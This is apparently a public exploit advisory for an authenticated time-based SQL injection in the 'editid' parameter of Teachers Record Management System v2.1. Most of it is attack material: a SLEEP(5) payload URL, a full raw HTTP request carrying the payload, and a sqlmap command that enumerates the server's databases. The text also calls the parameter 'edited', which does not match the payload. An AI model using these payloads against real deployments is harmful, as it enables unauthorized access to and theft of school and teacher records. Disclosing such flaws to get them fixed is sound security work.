# Exploit Title: Teachers Record Management System v2.1 | Authenticated Time-Based SQLi
# Date: 2025-03-04
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=10739
# Tested on: Kali Linux
# CVE: N/A
PoC:
1. login with admin credentials and go to subjects tab.
2. manage the subject, edit a subject as you want, and change the "edited"
parameter to SQLi payloads.
Example:
http://localhost/trms/admin/edit-subjects-detail.php?editid=SLEEP(5)-- -
--------------------------------------------------------------
--------------------------------------------------------------
Request :
GET /trms/admin/edit-subjects-detail.php?editid=SLEEP(5)--%20- HTTP/1.1
Host: localhost
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=2b5914a62f5bbda4b9e6a7fdaf4f7569
Connection: close
--------------------------------------------------------------
--------------------------------------------------------------
sqlmap command :
sqlmap -u "http://localhost/trms/admin/edit-subjects-detail.php?editid=1"
--dbs --batch --cookie "PHPSESSID=3dccea128fec3bd7717ac9d4c354c00c"